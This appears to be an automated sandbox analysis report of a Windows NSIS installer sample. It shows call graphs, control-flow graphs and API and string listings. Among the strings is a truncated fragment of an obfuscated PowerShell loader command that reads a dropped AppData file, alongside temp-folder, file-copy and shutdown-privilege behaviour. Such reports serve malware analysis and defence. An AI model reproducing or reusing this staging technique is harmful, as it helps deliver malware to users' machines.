2683 405755 2680->2683 2771 405d46 lstrcpynW 2680->2771 2681 4055fd DeleteFileW 2682 401934 2681->2682 2683->2682 2801 406089 FindFirstFileW 2683->2801 2685 40563a 2686 405640 lstrcatW 2685->2686 2687 40564d 2685->2687 2689 405653 2686->2689 2772 4057fa lstrlenW 2687->2772 2692 405663 lstrcatW 2689->2692 2693 405659 2689->2693 2695 40566e lstrlenW FindFirstFileW 2692->2695 2693->2692 2693->2695 2694 405773 2804 4057ae lstrlenW CharPrevW 2694->2804 2696 40574a 2695->2696 2716 405691 2695->2716 2696->2683 2698 4057db CharNextW 2698->2716 2700 40558d 5 API calls 2701 405785 2700->2701 2702 405789 2701->2702 2703 40579f 2701->2703 2702->2682 2708 404ffa 25 API calls 2702->2708 2704 404ffa 25 API calls 2703->2704 2704->2682 2705 405729 FindNextFileW 2707 405741 FindClose 2705->2707 2705->2716 2707->2696 2709 405796 2708->2709 2711 405be0 40 API calls 2709->2711 2712 40579d 2711->2712 2712->2682 2713 4055d5 64 API calls 2713->2716 2714 404ffa 25 API calls 2714->2705 2716->2698 2716->2705 2716->2713 2716->2714 2776 405d46 lstrcpynW 2716->2776 2777 40558d 2716->2777 2785 404ffa 2716->2785 2796 405be0 2716->2796 2722 405d75 2718->2722 2719 405fc0 2720 402afd 2719->2720 2752 405d46 lstrcpynW 2719->2752 2720->2675 2736 405fda 2720->2736 2722->2719 2723 405e28 GetVersion 2722->2723 2724 405f8e lstrlenW 2722->2724 2727 405d68 10 API calls 2722->2727 2729 405ea3 GetSystemDirectoryW 2722->2729 2730 405eb6 GetWindowsDirectoryW 2722->2730 2731 405fda 5 API calls 2722->2731 2732 405d68 10 API calls 2722->2732 2733 405f2f lstrcatW 2722->2733 2734 405eea SHGetSpecialFolderLocation 2722->2734 2745 405c13 RegOpenKeyExW 2722->2745 2750 405c8d wsprintfW 2722->2750 2751 405d46 lstrcpynW 2722->2751 2723->2722 2724->2722 2727->2724 2729->2722 2730->2722 2731->2722 2732->2722 2733->2722 2734->2722 2735 405f02 SHGetPathFromIDListW CoTaskMemFree 2734->2735 2735->2722 2742 405fe7 2736->2742 2737 40605d 2738 406062 CharPrevW 2737->2738 2741 406083 2737->2741 2738->2737 2739 406050 CharNextW 2739->2737 2739->2742 2741->2675 2742->2737 2742->2739 2743 40603c CharNextW 2742->2743 2744 40604b CharNextW 2742->2744 2753 4057db 2742->2753 2743->2742 2744->2739 2746 405c87 2745->2746 2747 405c47 RegQueryValueExW 2745->2747 2746->2722 2748 405c68 RegCloseKey 2747->2748 2748->2746 2750->2722 2751->2722 2752->2720 2754 4057e1 2753->2754 2755 4057f7 2754->2755 2756 4057e8 CharNextW 2754->2756 2755->2742 2756->2754 2807 405d46 lstrcpynW 2757->2807 2759 4058c7 2808 405859 CharNextW CharNextW 2759->2808 2762 4055f5 2762->2680 2762->2681 2763 405fda 5 API calls 2769 4058dd 2763->2769 2764 40590e lstrlenW 2765 405919 2764->2765 2764->2769 2767 4057ae 3 API calls 2765->2767 2766 406089 2 API calls 2766->2769 2768 40591e GetFileAttributesW 2767->2768 2768->2762 2769->2762 2769->2764 2769->2766 2770 4057fa 2 API calls 2769->2770 2770->2764 2771->2685 2773 405808 2772->2773 2774 40581a 2773->2774 2775 40580e CharPrevW 2773->2775 2774->2689 2775->2773 2775->2774 2776->2716 2814 4059aa GetFileAttributesW 2777->2814 2780 4055ba 2780->2716 2781 4055b0 DeleteFileW 2783 4055b6 2781->2783 2782 4055a8 RemoveDirectoryW 2782->2783 2783->2780 2784 4055c6 SetFileAttributesW 2783->2784 2784->2780 2786 4050b7 2785->2786 2788 405015 2785->2788 2786->2716 2787 405031 lstrlenW 2790 40505a 2787->2790 2791 40503f lstrlenW 2787->2791 2788->2787 2789 405d68 18 API calls 2788->2789 2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 3936 401cab 3937 402ab3 18 API calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 3998->4001 4006 405d68 18 API calls 3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 3024->3026 3025->3019 3028 4053d3 AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 3302->3306 3303->3302 3304 403ae1 3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 3355->3373 3358 403e06 lstrlenW 3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                        Executed Functions

                                                        Function 004031DD Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 44 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->44 40 40349a-4034a9 call 403640 OleUninitialize 27->40 41 40340a-403410 27->41 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 42 403310-403313 37->42 43 403315 37->43 39->20 45 403366-403373 call 405d46 39->45 57 4035a5-4035ab 40->57 58 4034af-4034bf call 405529 ExitProcess 40->58 46 403412-40341d call 4057db 41->46 47 40348a-403491 call 40371a 41->47 42->32 42->43 43->32 44->27 44->40 45->16 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->40 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->40 83 403470-403486 call 405d46 * 2 68->83 69->40 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403504-40352d call 405d46 75->78 79 4034f9-4034ff call 405d46 75->79 88 403532-40354e call 405d68 DeleteFileW 78->88 79->78 83->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->40 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                        APIs
                                                        • #17.COMCTL32 ref: 004031FC
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                        • OleInitialize.OLE32(00000000), ref: 0040320E
                                                          • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                          • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                          • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                        • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                          • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                        • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000), ref: 0040325E
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000020), ref: 00403285
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                        • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                        • OleUninitialize.OLE32(?), ref: 0040349F
                                                        • ExitProcess.KERNEL32 ref: 004034BF
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034CB
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034D7
                                                        • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                        • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmo,?), ref: 00403544
                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\ro7eoySJ9q.exe,0042A9B8,00000001), ref: 00403558
                                                        • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                        • ExitProcess.KERNEL32 ref: 0040363A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                        • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmo$"C:\Users\user\Desktop\ro7eoySJ9q.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                        • API String ID: 4107622049-653774770
                                                        • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                        • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                        • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                        • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E
                                                        Function 00405139 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 119 405316-405323 117->119 120 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->120 136 405241-405244 118->136 137 405225-40523f SendMessageW * 2 118->137 123 405341-405348 119->123 124 405325-40532b 119->124 120->119 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 140 405371-405375 126->140 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 138 4053aa-4053bd SendMessageW 131->138 133->126 141 405398-40539a call 403f6e 134->141 142 40538a-405393 call 404ffa 134->142 144 405254-40526b call 403f95 136->144 145 405246-405252 SendMessageW 136->145 137->136 146 4054c1-4054c3 138->146 147 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 138->147 141->129 142->141 155 4052a1-4052c2 GetDlgItem SendMessageW 144->155 156 40526d-405281 ShowWindow 144->156 145->144 146->140 153 4053e6-4053f7 GetWindowRect 147->153 154 4053f9-4053ff 147->154 157 405402-40541a TrackPopupMenu 153->157 154->157 155->146 160 4052c8-4052e0 SendMessageW * 2 155->160 158 405290 156->158 159 405283-40528e ShowWindow 156->159 157->146 161 405420-405437 157->161 162 405296-40529c call 403fca 158->162 159->162 160->146 163 40543c-405457 SendMessageW 161->163 162->155 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->146
                                                        APIs
